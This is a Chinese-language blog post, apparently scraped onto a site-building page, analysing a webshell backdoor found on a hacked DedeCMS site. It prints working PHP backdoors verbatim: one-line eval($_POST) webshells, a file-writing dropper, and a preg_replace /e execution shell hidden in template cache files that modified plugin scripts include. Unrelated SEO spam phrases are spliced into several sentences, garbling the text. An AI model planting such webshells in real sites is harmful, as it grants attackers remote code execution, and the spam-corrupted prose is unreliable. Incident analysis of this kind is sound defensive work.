當前位置：主頁 > 網站建設 > dedecms之無節操webshell后門分析,搭建網站

dedecms之無節操webshell后門分析,搭建網站

時間:2023-07-23 12:07:23 閱讀: 文章分類: 網站建設作者: 網站編輯員

導讀:搭建網站搭建網站最近某公司網站用的dedecms,今天被某黑闊getshell了，為了還原黑闊入侵的手法，用鬼哥的getshell測試居然沒成功, 是不是getshell過一次建站技術員建站技術。

建站技術員建站技術

最近某公司網站用的dedecms,今天被某黑闊getshell了，為了還原黑闊入侵的手法，用鬼哥的getshell測試居然沒成功, 是不是getshell過一次，再次就不會成功呢？

無奈只能打包代碼，用各織夢模板安裝種webshell掃描器只掃到一個data/tplcache/xxxxx.織夢模板免費inc文件，文件代碼如下：

{dede:php}file_put_contents(’90sec.php’,'<?php eval($_POST[guige]);?>’);{/dede:php}

但是翻遍所有的Web目錄也沒有找到90sec.php文件，有朋友指點說可能是其它文件include這個文件。然后又用Seay的代碼審計工具定義關鍵字各種掃，還是沒找到。

最后老大翻到data/dede商城模板cache目錄下發現了幾個htm文件，myad-1.htm,myad-16.htm,mytag-1208.htm等，打開這些html文件，代碼分別如下：

<!–

document.write(“dedecmsisok<?php @eval($_POST[cmd]);?>”);

–>

<!–

document.write(“<?php $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ?>axxxxx’);echo ‘OK’;@fclose($fp);?>”);

–>

<!–

document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/[copyright]/e’,$_REQUEST['guige'],’error’);?>”);

–>

看到這幾個文件很奇怪，不知道黑闊要干嘛？？雖然代碼看似很熟悉，但是HTML文件能當后門用么？想起之前朋友說的include,然后結合前段時間的getshell漏洞利用細節，最終翻到plus/mytag_js.php文件，在這個文件里終于發現黑闊無節操的地方，主要代碼如下：

dedecms之無節操webshell后門分析

看到上面的代碼我們應該知道黑闊是多么的邪惡，在生成的htm格式的cache文件中寫入各種類型的一句話代碼，然后再修改plus/ad_js.php和mytag_js.php文件，包含htm格式的cache文件。這樣黑闊只需要在菜刀中填入以下URL就可以連接一句話了.

關鍵詞標簽: Web 后門節操

聲明: 本文由我的SEOUC技術文章主頁發布于:2023-07-23 ，文章dedecms之無節操webshell后門分析,搭建網站主要講述節操,后門,web網站建設源碼以及服務器配置搭建相關技術文章。轉載請保留鏈接: http://www.bifwcx.com/article/web_35565.html